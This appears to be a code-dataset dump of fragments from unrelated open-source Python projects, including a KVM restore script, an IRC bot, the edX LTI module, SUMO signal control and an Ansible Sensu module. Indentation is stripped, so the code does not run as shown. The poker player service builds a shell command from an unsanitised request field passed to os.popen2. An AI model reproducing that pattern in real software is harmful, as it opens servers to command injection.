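        # entity_id with the deprecation warning above, targets every
        # available entity (hypothetical entity id, for illustration only)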
@callback
def async_register_entity_service(self, name, schema, func):
"""Register an entity service."""
async def handle_service(call):
"""Handle the service."""
await self.hass.helpers.service.entity_service_call(
self._platforms.values(), func, call
)
self.hass.services.async_register(
self.domain, name, handle_service, schema)
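    # Hypothetical component code using the helper above: register a
    # "set_speed" service fanned out to matching entities on each platform
    # (the voluptuous/config_validation helpers are assumed, not imported here):
    #
    #     component.async_register_entity_service(
    #         "set_speed",
    #         {vol.Required("speed"): cv.string},
    #         "async_set_speed",  # method looked up on each target entity
    #     )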
async def _async_setup_platform(self, platform_type, platform_config,
discovery_info=None):
"""Set up a platform for this component."""
platform = await async_prepare_setup_platform(
self.hass, self.config, self.domain, platform_type)
if platform is None:
return
# Use config scan interval, fallback to platform if none set
scan_interval = platform_config.get(
CONF_SCAN_INTERVAL, getattr(platform, 'SCAN_INTERVAL', None))
entity_namespace = platform_config.get(CONF_ENTITY_NAMESPACE)
key = (platform_type, scan_interval, entity_namespace)
if key not in self._platforms:
self._platforms[key] = self._async_init_entity_platform(
platform_type, platform, scan_interval, entity_namespace
)
await self._platforms[key].async_setup(platform_config, discovery_info)
@callback
def _async_update_group(self):
"""Set up and/or update component group.
This method must be run in the event loop.
"""
if self.group_name is None:
return
ids = [entity.entity_id for entity in
sorted(self.entities,
key=lambda entity: entity.name or entity.entity_id)]
self.hass.async_create_task(
self.hass.services
tiagoprn/devops | shellscripts/kvm/restore_kvm_backup.py | Python | mit | 3,178 | 0.002203
"""
Given a KVM machine description file, parse its XML
and change the contents of the nodes "name" and "disk/source.file".
Usage:
python restore_kvm_backup.py \
-x '/kvm/backups/centos7-06/kvm/backups/centos7-06/20180924.0850.23/config.xml' \
-b '/kvm/backups/centos7-06/kvm/backups/centos7-06/20180924.0850.23/centos7-06.qcow2' \
-n 'centos7-06' \
-i '/kvm/images/centos7-06.qcow2';
"""
import argparse
import os
import subprocess
import sys
import xml.etree.ElementTree as et
from time import sleep
cli_parser = argparse.ArgumentParser()
cli_parser.add_argument("-x", "--xml-file", required=True,
help="the backup kvm xml configuration file "
"containing the machine description.")
cli_parser.add_argument("-b", "--backup-image-file", required=True,
help="the full path to the qcow2 image file to be restored")
cli_parser.add_argument("-n", "--vm-name", required=True,
help="image name of the vm to show on make status")
cli_parser.add_argument("-i", "--destination-image-file", required=True,
help="the full path to where the qcow2 image must be restored")
args = vars(cli_parser.parse_args())
XML_FILE = args['xml_file']
VM_NAME = args['vm_name']
BACKUP_IMAGE_FILE = args['backup_image_file']
IMAGE_FILE = args['destination_image_file']
XML_RESTORATION_FILE = '/tmp/restoration.xml'
if not os.path.exists(XML_FILE):
print('The backup vm XML config file was not found, impossible to move on.')
sys.exit(1)
if not os.path.exists(BACKUP_IMAGE_FILE):
print('The backup image file was not found, impossible to move on.')
sys.exit(1)
def change_backup_xml_configuration_to_restore_vm():
tree = et.parse(XML_FILE)
root = tree.getroot()
for name in root.iter('name'):
name.text = VM_NAME
for disk in root.iter('disk'):
for child in disk:
if child.tag == 'source' and child.attrib['file'].endswith('qcow2'):
child.attrib['file'] = IMAGE_FILE
break
tree.write(XML_RESTORATION_FILE)
print('DONE. The new XML file you must use to restore your VM '
'is at {}.'.format(XML_RESTORATION_FILE))
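# For example, a backup XML containing <name>backup-vm</name> and a disk
# <source file='/kvm/backups/old.qcow2'/> is rewritten so <name> holds
# VM_NAME and the qcow2 <source file=...> points at IMAGE_FILE, then saved
# to /tmp/restoration.xml ready for the `virsh define` call below.
# (Illustrative element values; the real ones come from the backup file.)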
if __name__ == "__main__":
print('Shutting down vm if it is active...')
subprocess.run(['sudo', 'virsh', 'shutdown', VM_NAME])
print('Removing existing vm...')
    subprocess.run(['sudo', 'virsh', 'undefine', VM_NAME])
print('Removing disk for the existing vm...')
if os.path.exists(IMAGE_FILE):
os.unlink(IMAGE_FILE)
print('Changing backup kvm config to restoration...')
change_backup_xml_configuration_to_restore_vm()
print('Copying the backup disk as the vm disk...')
subprocess.run(['sudo', 'cp', '-farv', BACKUP_IMAGE_FILE, IMAGE_FILE])
print('Restoring vm to the backup image...')
subprocess.run(['sudo', 'virsh', '-c', 'qemu:///system', 'define', XML_RESTORATION_FILE])
print('Giving some time before starting the vm...')
sleep(5)
print('Starting the restored vm now...')
subprocess.run(['sudo', 'virsh', '-c', 'qemu:///system', 'start', VM_NAME])
print('DONE.')
Jakeable/Ralybot | plugins/admin_channel.py | Python | gpl-3.0 | 5,871 | 0.002555
from ralybot import hook
def mode_cmd(mode, text, text_inp, chan, conn, notice):
""" generic mode setting function """
split = text_inp.split(" ")
if split[0].startswith("#"):
channel = split[0]
target = split[1]
notice("Attempting to {} {} in {}...".format(text, target, channel))
conn.send("MODE {} {} {}".format(channel, mode, target))
else:
channel = chan
target = split[0]
notice("Attempting to {} {} in {}...".format(text, target, channel))
conn.send("MODE {} {} {}".format(channel, mode, target))
def mode_cmd_no_target(mode, text, text_inp, chan, conn, notice):
""" generic mode setting function without a target"""
split = text_inp.split(" ")
if split[0].startswith("#"):
channel = split[0]
notice("Attempting to {} {}...".format(text, channel))
conn.send("MODE {} {}".format(channel, mode))
else:
channel = chan
notice("Attempting to {} {}...".format(text, channel))
conn.send("MODE {} {}".format(channel, mode))
@hook.command(permissions=["op_ban", "op"])
def ban(text, conn, chan, notice):
"""[channel] <user> - bans <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+b", "ban", text, chan, conn, notice)
@hook.command(permissions=["op_ban", "op"])
def unban(text, conn, chan, notice):
"""[channel] <user> - unbans <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-b", "unban", text, chan, conn, notice)
@hook.command(permissions=["op_quiet", "op"])
def quiet(text, conn, chan, notice):
"""[channel] <user> - quiets <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+q", "quiet", text, chan, conn, notice)
@hook.command(permissions=["op_quiet", "op"])
def unquiet(text, conn, chan, notice):
"""[channel] <user> - unquiets <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-q", "unquiet", text, chan, conn, notice)
@hook.command(permissions=["op_voice", "op"])
def voice(text, conn, chan, notice):
"""[channel] <user> - voices <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+v", "voice", text, chan, conn, notice)
@hook.command(permissions=["op_voice", "op"])
def devoice(text, conn, chan, notice):
"""[channel] <user> - devoices <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-v", "devoice", text, chan, conn, notice)
@hook.command(permissions=["op_op", "op"])
def op(text, conn, chan, notice):
"""[channel] <user> - ops <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+o", "op", text, chan, conn, notice)
@hook.command(permissions=["op_op", "op"])
def deop(text, conn, chan, notice):
"""[channel] <user> - deops <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-o", "deop", text, chan, conn, notice)
@hook.command(permissions=["op_topic", "op"])
def topic(text, conn, chan):
"""[channel] <topic> - changes the topic to <topic> in [channel], or in the caller's channel
if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
message = " ".join(split[1:])
chan = split[0]
else:
message = " ".join(split)
conn.send("TOPIC
|
{} :{}".format(chan, message))
@hook.command(permissions=["op_kick", "op"])
def kick(text, chan, conn, notice):
"""[channel] <user> - kicks <user> from [channel], or from the caller's channel if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
channel = split[0]
target = split[1]
if len(split) > 2:
reason = " ".join(split[2:])
out = "KICK {} {}: {}".format(channel, target, reason)
else:
out = "KICK {} {}".format(channel, target)
else:
channel = chan
target = split[0]
if len(split) > 1:
reason = " ".join(split[1:])
out = "KICK {} {} :{}".format(channel, target, reason)
else:
out = "KICK {} {}".format(channel, target)
notice("Attempting to kick {} from {}...".format(target, channel))
conn.send(out)
@hook.command(permissions=["op_rem", "op"])
def remove(text, chan, conn):
"""[channel] <user> - force removes <user> from [channel], or in the caller's channel if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
message = " ".join(split[1:])
chan = split[0]
out = "REMOVE {} :{}".format(chan, message)
else:
message = " ".join(split)
out = "REMOVE {} :{}".format(chan, message)
conn.send(out)
@hook.command(permissions=["op_mute", "op"], autohelp=False)
def mute(text, conn, chan, notice):
"""[channel] - mutes [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("+m", "mute", text, chan, conn, notice)
@hook.command(permissions=["op_mute", "op"], autohelp=False)
def unmute(text, conn, chan, notice):
"""[channel] - unmutes [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("-m", "unmute", text, chan, conn, notice)
@hook.command(permissions=["op_lock", "op"], autohelp=False)
def lock(text, conn, chan, notice):
"""[channel] - locks [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("+i", "lock", text, chan, conn, notice)
@hook.command(permissions=["op_lock", "op"], autohelp=False)
def unlock(text, conn, chan, notice):
"""[channel] - unlocks [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("-i", "unlock", text, chan, conn, notice)
benschulz/servo | tests/wpt/mozilla/tests/mozilla/resources/no_mime_type.py | Python | mpl-2.0 | 443 | 0
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
def main(request, response):
headers = []
if 'Content-Type' in request.GET:
headers += [('Content-Type', request.GET['Content-Type'])]
with open('./resources/ahem/AHEM____.TTF') as f:
        return 200, headers, f.read()
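# e.g. a GET with ?Content-Type=font/ttf serves the font bytes with that
# header, while a plain GET sends no Content-Type at all, which is the
# behaviour this test resource exists to exercise.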
onnovalkering/sparql-over-sms | sos-service/src/persistence/models/message.py | Python | mit | 1,021 | 0.000979
from persistence.models import Agent, BaseModel
from peewee import *
class Message(BaseModel):
"""description of class"""
correlationid = CharField()
category = IntegerField()
body = CharField(null=True)
    sender = ForeignKeyField(Agent, related_name='send_messages')
receiver = ForeignKeyField(Agent, related_name='received_messages')
# flags
    complete = BooleanField(default=False)
processed = BooleanField(default=False)
# computed
def get_body(self):
if self.body is not None:
return self.body
if not self.complete:
return None
messageparts = sorted(self.parts, key=lambda x: x.position)
body = ''.join([part.body for part in messageparts])
return body
def as_dict(self):
return {
'id': self.correlationid,
'sender': self.sender.name,
'reciever': self.receiver.name,
'category': self.category,
'body': self.get_body()
}
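# Example of the reassembly above: with self.body unset, complete=True, and
# related parts rows (position, body) of (1, "world") and (0, "hello "),
# get_body() sorts by position and returns "hello world"; as_dict() then
# embeds that string under the "body" key. (Illustrative values; the parts
# model itself is defined elsewhere.)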
jolyonb/edx-platform | common/lib/xmodule/xmodule/lti_module.py | Python | agpl-3.0 | 37,872 | 0.002905
"""
THIS MODULE IS DEPRECATED IN FAVOR OF https://github.com/edx/xblock-lti-consumer
Learning Tools Interoperability (LTI) module.
Resources
---------
Theoretical background and detailed specifications of LTI can be found on:
http://www.imsglobal.org/LTI/v1p1p1/ltiIMGv1p1p1.html
This module is based on the version 1.1.1 of the LTI specifications by the
IMS Global authority. For authentication, it uses OAuth1.
When responding back to the LTI tool provider, we must issue a correct
response. Types of responses and their message payload is available at:
Table A1.2 Interpretation of the 'CodeMajor/severity' matrix.
http://www.imsglobal.org/gws/gwsv1p0/imsgws_wsdlBindv1p0.html
A resource to test the LTI protocol (PHP realization):
http://www.imsglobal.org/developers/LTI/test/v1p1/lms.php
We have also begun to add support for LTI 1.2/2.0. We will keep this
docstring in synch with what support is available. The first LTI 2.0
feature to be supported is the REST API results service, see specification
at
http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html
What is supported:
------------------
1.) Display of simple LTI in iframe or a new window.
2.) Multiple LTI components on a single page.
3.) The use of multiple LTI providers per course.
4.) Use of advanced LTI component that provides back a grade.
A) LTI 1.1.1 XML endpoint
a.) The LTI provider sends back a grade to a specified URL.
b.) Currently only action "update" is supported. "Read", and "delete"
actions initially weren't required.
B) LTI 2.0 Result Service JSON REST endpoint
(http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html)
a.) Discovery of all such LTI http endpoints for a course. External tools GET from this discovery
endpoint and receive URLs for interacting with individual grading units.
(see lms/djangoapps/courseware/views/views.py:get_course_lti_endpoints)
b.) GET, PUT and DELETE in LTI Result JSON binding
(http://www.imsglobal.org/lti/ltiv2p0/mediatype/application/vnd/ims/lis/v2/result+json/index.html)
for a provider to synchronize grades into edx-platform. Reading, Setting, and Deleting
Numeric grades between 0 and 1 and text + basic HTML feedback comments are supported, via
GET / PUT / DELETE HTTP methods respectively
"""
from __future__ import absolute_import
import base64
import datetime
import hashlib
import logging
import textwrap
from xml.sax.saxutils import escape
from pkg_resources import resource_string
import bleach
import mock
import oauthlib.oauth1
import six
import six.moves.urllib.parse
from lxml import etree
from oauthlib.oauth1.rfc5849 import signature
from pytz import UTC
from six import text_type
from webob import Response
from xblock.core import List, Scope, String, XBlock
from xblock.fields import Boolean, Float
from xmodule.editing_module import MetadataOnlyEditingDescriptor
from xmodule.lti_2_util import LTI20ModuleMixin, LTIError
from xmodule.raw_module import EmptyDataRawDescriptor
from xmodule.x_module import XModule, module_attr
log = logging.getLogger(__name__)
DOCS_ANCHOR_TAG_OPEN = (
"<a target='_blank' "
"href='https://edx.readthedocs.io/projects/edx-partner-course-staff/en/latest/exercises_tools/lti_component.html'>"
)
# Make '_' a no-op so we can scrape strings. Using lambda instead of
# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file
_ = lambda text: text
class LTIFields(object):
"""
Fields to define and obtain LTI tool from provider are set here,
except credentials, which should be set in course settings::
`lti_id` is id to connect tool with credentials in course settings. It should not contain :: (double semicolon)
`launch_url` is launch URL of tool.
`custom_parameters` are additional parameters to navigate to proper book and book page.
For example, for Vitalsource provider, `launch_url` should be
*https://bc-staging.vitalsource.com/books/book*,
and to get to proper book and book page, you should set custom parameters as::
vbid=put_book_id_here
book_location=page/put_page_number_here
Default non-empty URL for `launch_url` is needed due to oauthlib demand (URL scheme should be presented)::
https://github.com/idan/oauthlib/blob/master/oauthlib/oauth1/rfc5849/signature.py#L136
"""
display_name = String(
display_name=_("Display Name"),
help=_(
"The display name for this component. "
"Analytics reports may also use the display name to identify this component."
),
scope=Scope.settings,
default="LTI",
)
lti_id = String(
display_name=_("LTI ID"),
help=_(
"Enter the LTI ID for the external LTI provider. "
"This value must be the same LTI ID that you entered in the "
"LTI Passports setting on the Advanced Settings page."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
default='',
scope=Scope.settings
)
launch_url = String(
display_name=_("LTI URL"),
help=_(
"Enter the URL of the external tool that this component launches. "
"This setting is only used when Hide External Tool is set to False."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
default='http://www.example.com',
scope=Scope.settings)
custom_parameters = List(
display_name=_("Custom Parameters"),
help=_(
"Add the key/value pair for any custom parameters, such as the page your e-book should open to or "
"the background color for this component."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
scope=Scope.settings)
open_in_a_new_page = Boolean(
display_name=_("Open in New Page"),
help=_(
"Select True if you want students to click a link that opens the LTI tool in a new window. "
"Select False if you want the LTI content to open in an IFrame in the current page. "
"This setting is only used when Hide External Tool is set to False. "
),
default=True,
scope=Scope.settings
)
has_score = Boolean(
display_name=_("Scored"),
help=_(
"Select True if this component will receive a numerical score from the external LTI system."
),
default=False,
scope=Scope.settings
)
weight = Float(
display_name=_("Weight"),
help=_(
"Enter the number of points possible for this component. "
"The default value is 1.0. "
"This setting is only used when Scored is set to True."
),
default=1.0,
scope=Scope.settings,
values={"min": 0},
)
module_score = Float(
help=_("The score kept in the xblock KVS -- duplicate of the published score in django DB"),
default=None,
scope=Scope.user_state
)
score_comment = String(
help=_("Comment as returned from grader, LTI2.0 spec"),
default="",
scope=Scope.user_state
)
hide_launch = Boolean(
display_name=_("Hide External Tool"),
help=_(
"Select True if you want to use this component as a placeholder for syncing with an external grading "
"system rather than launch an external tool. "
"This setting hides the Launch button and any IFrames for this component."
rolandkakonyi/poker-player-objc | player_service.py | Python | mit | 1,447 | 0.002073
import time
import cgi
import json
import os
import BaseHTTPServer
HOST_NAME = 'localhost'
PORT_NUMBER = 9400
class PlayerService(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'multipart/form-data':
postvars = cgi.parse_multipart(self.rfile, pdict)
elif ctype == 'application/x-www-form-urlencoded':
length = int(self.headers.getheader('content-length'))
postvars = cgi.parse_qs(self.rfile.read(length), keep_blank_values=1)
else:
postvars = {}
action = postvars['action'][0]
w, r = os.popen2("./obj/player " + action)
if 'game_state' in postvars:
game_state = postvars['game_state'][0]
            w.write(game_state)
w.close()
response = r.read()
self.wfile.write(response)
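    # Example round trip (hypothetical values): a judge service POSTs form
    # data such as action=bet_request and game_state={"players": []}; the
    # handler pipes game_state to ./obj/player's stdin and echoes the
    # process's stdout back as the HTTP response body.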
if __name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), PlayerService)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
cbrafter/TRB18_GPSVA | codes/sumoAPI/HybridVAControl.py | Python | mit | 15,253 | 0.005704
#!/usr/bin/env python
"""
@file HybridVAControl.py
@author Craig Rafter
@date 19/08/2016
class for fixed time signal control
"""
import signalControl, readJunctionData, traci
from math import atan2, degrees, hypot
import numpy as np
from collections import defaultdict
class HybridVAControl(signalControl.signalControl):
def __init__(self, junctionData, minGreenTime=10., maxGreenTime=60., scanRange=250, packetRate=0.2):
super(HybridVAControl, self).__init__()
self.junctionData = junctionData
self.firstCalled = traci.simulation.getCurrentTime()
self.lastCalled = self.firstCalled
self.lastStageIndex = 0
traci.trafficlights.setRedYellowGreenState(self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString)
self.packetRate = int(1000*packetRate)
self.transition = False
# self.CAMactive = False
# dict[vehID] = [position, heading, velocity, Tdetect]
self.newVehicleInfo = {}
self.oldVehicleInfo = {}
self.scanRange = scanRange
self.jcnPosition = np.array(traci.junction.getPosition(self.junctionData.id))
self.jcnCtrlRegion = self._getJncCtrlRegion()
# print(self.junctionData.id)
# print(self.jcnCtrlRegion)
self.controlledLanes = traci.trafficlights.getControlledLanes(self.junctionData.id)
# dict[laneID] = [heading, shape]
        self.laneDetectionInfo = self._getIncomingLaneInfo()
self.stageTime = 0.0
self.minGreenTime = minGreenTime
self.maxGreenTime = maxGreenTime
self.secondsPerMeterTraffic = 0.45
self.nearVehicleCatchDistance = 25
        self.extendTime = 1.0 # 5 m in 10 m/s (acceptable journey 1.333)
self.laneInductors = self._getLaneInductors()
self.TIME_MS = self.firstCalled
self.TIME_SEC = 0.001 * self.TIME_MS
'''def minmax(x, lower, upper):
return min(max(x, lower), upper)
'''
def process(self):
self.TIME_MS = traci.simulation.getCurrentTime()
self.TIME_SEC = 0.001 * self.TIME_MS
# Packets sent on this step
# packet delay + only get packets towards the end of the second
if (not self.TIME_MS % self.packetRate) and (not 50 < self.TIME_MS % 1000 < 650):
#self.CAMactive = True
self._getCAMinfo()
# else:
# self.CAMactive = False
# Update stage decisions
# If there's no ITS enabled vehicles present use VA ctrl
numCAVs = len(self.oldVehicleInfo)
isControlInterval = not self.TIME_MS % 1000
#if isControlInterval: print('CTRL')
if numCAVs < 1 and isControlInterval:
detectTimePerLane = self._getLaneDetectTime()
# Set adaptive time limit
if np.any(detectTimePerLane < 2):
extend = self.extendTime
else:
extend = 0.0
self.stageTime = max(self.stageTime + extend, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('A'+str(self.stageTime))
# If active and on the second, or transition then make stage descision
elif numCAVs >= 1 and isControlInterval:
oncomingVeh = self._getOncomingVehicles()
# If new stage get furthest from stop line whose velocity < 5% speed
# limit and determine queue length
if self.transition:
furthestVeh = self._getFurthestStationaryVehicle(oncomingVeh)
if furthestVeh[0] != '':
meteredTime = self.secondsPerMeterTraffic*furthestVeh[1]
self.stageTime = max(self.minGreenTime, meteredTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
# If we're in this state this should never happen but just in case
else:
self.stageTime = self.minGreenTime
#print('B'+str(self.stageTime))
# If currently staging then extend time if there are vehicles close
# to the stop line
else:
nearestVeh = self._getNearestVehicle(oncomingVeh)
# If a vehicle detected
if nearestVeh != '' and nearestVeh[1] <= self.nearVehicleCatchDistance:
if (self.oldVehicleInfo[nearestVeh[0]][2] != 1e6
and self.oldVehicleInfo[nearestVeh[0]][2] > 1.0/self.secondsPerMeterTraffic):
meteredTime = nearestVeh[1]/self.oldVehicleInfo[nearestVeh[0]][2]
else:
meteredTime = self.secondsPerMeterTraffic*nearestVeh[1]
elapsedTime = 0.001*(self.TIME_MS - self.lastCalled)
Tremaining = self.stageTime - elapsedTime
self.stageTime = elapsedTime + max(meteredTime, Tremaining)
#self.stageTime = max(self.stageTime, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('C'+str(self.stageTime))
# no detectable near vehicle try inductive loop info
elif nearestVeh == '' or nearestVeh[1] > self.nearVehicleCatchDistance:
detectTimePerLane = self._getLaneDetectTime()
# Set adaptive time limit
if np.any(detectTimePerLane < 2):
extend = self.extendTime
else:
extend = 0.0
self.stageTime = max(self.stageTime + extend, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('D'+str(self.stageTime))
else:
pass
# process stage as normal
else:
pass
# print(self.stageTime)
if isControlInterval:
self.transition = False
if self.transitionObject.active:
# If the transition object is active i.e. processing a transition
pass
# elif (self.TIME_MS - self.firstCalled) < (self.junctionData.offset*1000):
# # Process offset first
# pass
elif (self.TIME_MS - self.lastCalled) < self.stageTime*1000:
# Before the period of the next stage
pass
else:
# Not active, not in offset, stage not finished
if len(self.junctionData.stages) != (self.lastStageIndex)+1:
# Loop from final stage to first stage
self.transitionObject.newTransition(
self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString,
self.junctionData.stages[self.lastStageIndex+1].controlString)
self.lastStageIndex += 1
else:
# Proceed to next stage
self.transitionObject.newTransition(
self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString,
self.junctionData.stages[0].controlString)
self.lastStageIndex = 0
#print(self.stageTime)
self.lastCalled = self.TIME_MS
self.transition = True
self.stageTime = 0.0
super(HybridVAControl, self).process()
def _getHeading(self, currentLoc, prevLoc):
dy = currentLoc[1] - prevLoc[1]
dx = currentLoc[0] - prevLoc[0]
if currentLoc[1] == prevLoc[1] and currentLoc[0] == prevLoc[0]:
heading = -1
else:
if dy >= 0:
heading = degrees(atan2(dy, dx))
else:
heading = 360 + degrees(atan2(dy, dx))
# Map angle to make compatible with SUMO heading
if 0 <= heading <= 90:
heading = 90 - heading
elif 90 < heading < 360:
            heading = 450 - heading
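            # check: east (atan2 angle 0) maps to SUMO heading 90, north (90)
            # maps to 0, west (180) maps to 270, keeping results in [0, 360)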
alfredoavanzosc/odoo-addons | partner_contact_birthdate_age/__openerp__.py | Python | agpl-3.0 | 640 | 0
# -*- coding: utf-8 -*-
# (c) 2016 Alfredo de la Fuente - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
{
"name": "Partner Contact Birthdate Age",
'version': '8.0.1.1.0',
'license': "AGPL-3",
'author': "AvanzOSC",
'website': "http://www.avanzosc.es",
'contributors': [
"Ana Juaristi <anajuaristi@avanzosc.es>",
"Alfredo de la Fuente <alfredodelafuente@avanzosc.es",
],
"category": "Customer Relationship Management",
"depends": [
'partner_contact_birthdate',
],
"data": [
'views/res_partner_view.xml',
],
"installable": True,
}
jbenden/ansible | lib/ansible/modules/monitoring/sensu_client.py | Python | gpl-3.0 | 9,506 | 0.002525
#!/usr/bin/python
# (c) 2017, Red Hat Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: sensu_client
author: "David Moreau Simard (@dmsimard)"
short_description: Manages Sensu client configuration
version_added: 2.4
description:
- Manages Sensu client configuration.
- 'For more information, refer to the Sensu documentation: U(https://sensuapp.org/docs/latest/reference/clients.html)'
options:
state:
description:
- Whether the client should be present or not
choices: [ 'present', 'absent' ]
required: False
default: present
name:
description:
- A unique name for the client. The name cannot contain special characters or spaces.
required: False
default: System hostname as determined by Ruby Socket.gethostname (provided by Sensu)
address:
description:
- An address to help identify and reach the client. This is only informational, usually an IP address or hostname.
required: False
default: Non-loopback IPv4 address as determined by Ruby Socket.ip_address_list (provided by Sensu)
subscriptions:
description:
- An array of client subscriptions, a list of roles and/or responsibilities assigned to the system (e.g. webserver).
- These subscriptions determine which monitoring checks are executed by the client, as check requests are sent to subscriptions.
- The subscriptions array items must be strings.
required: True
default: null
safe_mode:
description:
- If safe mode is enabled for the client. Safe mode requires local check definitions in order to accept a check request and execute the check.
choices: [ 'true', 'false' ]
required: False
default: false
redact:
description:
- Client definition attributes to redact (values) when logging and sending client keepalives.
required: False
default: null
socket:
description:
- The socket definition scope, used to configure the Sensu client socket.
required: False
default: null
keepalives:
description:
- If Sensu should monitor keepalives for this client.
choices: [ 'true', 'false' ]
required: False
default: true
keepalive:
description:
- The keepalive definition scope, used to configure Sensu client keepalives behavior (e.g. keepalive thresholds, etc).
required: False
default: null
registration:
description:
- The registration definition scope, used to configure Sensu registration event handlers.
required: False
default: null
deregister:
description:
- If a deregistration event should be created upon Sensu client process stop.
choices: [ 'true', 'false' ]
required: False
default: false
deregistration:
description:
- The deregistration definition scope, used to configure automated Sensu client de-registration.
required: False
default: null
ec2:
description:
- The ec2 definition scope, used to configure the Sensu Enterprise AWS EC2 integration (Sensu Enterprise users only).
required: False
default: null
chef:
description:
- The chef definition scope, used to configure the Sensu Enterprise Chef integration (Sensu Enterprise users only).
required: False
default: null
puppet:
description:
- The puppet definition scope, used to configure the Sensu Enterprise Puppet integration (Sensu Enterprise users only).
required: False
default: null
servicenow:
description:
- The servicenow definition scope, used to configure the Sensu Enterprise ServiceNow integration (Sensu Enterprise users only).
required: False
default: null
notes:
- Check mode is supported
requirements: [ ]
'''
EXAMPLES = '''
# Minimum possible configuration
- name: Configure Sensu client
sensu_client:
subscriptions:
- default
# With customization
- name: Configure Sensu client
sensu_client:
name: "{{ ansible_fqdn }}"
address: "{{ ansible_default_ipv4['address'] }}"
subscriptions:
- default
- webserver
redact:
- password
socket:
bind: 127.0.0.1
port: 3030
keepalive:
thresholds:
warning: 180
critical: 300
handlers:
- email
custom:
- broadcast: irc
occurrences: 3
register: client
notify:
- Restart sensu-client
- name: Secure Sensu client configuration file
file:
path: "{{ client['file'] }}"
owner: "sensu"
group: "sensu"
mode: "0600"
- name: Delete the Sensu client configuration
sensu_client:
state: "absent"
'''
RETURN = '''
config:
description: Effective client configuration, when state is present
returned: success
type: dict
sample: {'name': 'client', 'subscriptions': ['default']}
file:
description: Path to the client configuration file
returned: success
type: string
sample: "/etc/sensu/conf.d/client.json"
'''
import json
import os
from ansible.module_utils.basic import AnsibleModule
def main():
module = AnsibleModule(
supports_check_mode=True,
argument_spec=dict(
state=dict(type='str', required=False, choices=['present', 'absent'], default='present'),
name=dict(type='str', required=False),
            address=dict(type='str', required=False),
subscriptions=dict(type='list', required=False),
safe_mode=dict(type='bool', required=False, default=False),
redact=dict(type='list', required=False),
socket=dict(type='dict', required=False),
keepalives=dict(type='bool', required=False, default=True),
            keepalive=dict(type='dict', required=False),
registration=dict(type='dict', required=False),
deregister=dict(type='bool', required=False),
deregistration=dict(type='dict', required=False),
ec2=dict(type='dict', required=False),
chef=dict(type='dict', required=False),
puppet=dict(type='dict', required=False),
servicenow=dict(type='dict', required=False)
),
required_if=[
['state', 'present', ['subscriptions']]
]
)
state = module.params['state']
path = "/etc/sensu/conf.d/client.json"
if state == 'absent':
if os.path.exists(path):
if module.check_mode:
msg = '{path} would have been deleted'.format(path=path)
module.exit_json(msg=msg, changed=True)
else:
try:
os.remove(path)
msg = '{path} deleted successfully'.format(path=path)
module.exit_json(msg=msg, changed=True)
except OSError as e:
msg = 'Exception when trying to delete {path}: {exception}'
module.fail_json(
msg=msg.format(path=path, exception=str(e)))
else:
# Idempotency: it's okay if the file doesn't exist
msg = '{path} already does not exist'.format(path=path)
module.exit_json(msg=msg)
# Build client configuration from module arguments
config = {'client': {}}
args = ['name', 'address', 'subscriptions', 'safe_mode', 'redact',
'socket', 'keepalives', 'keepalive', 'registration', 'deregister',
'deregistration', 'ec2', 'chef', 'puppet', 'servicenow']
for arg in args:
if arg in module.params and module.params[arg] is not None:
config['client'][arg] = module.params[arg]
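    # e.g. with name=web01 and subscriptions=[default] (plus the argument
    # defaults safe_mode=False and keepalives=True), config is now
    #   {'client': {'name': 'web01', 'subscriptions': ['default'],
    #               'safe_mode': False, 'keepalives': True}}
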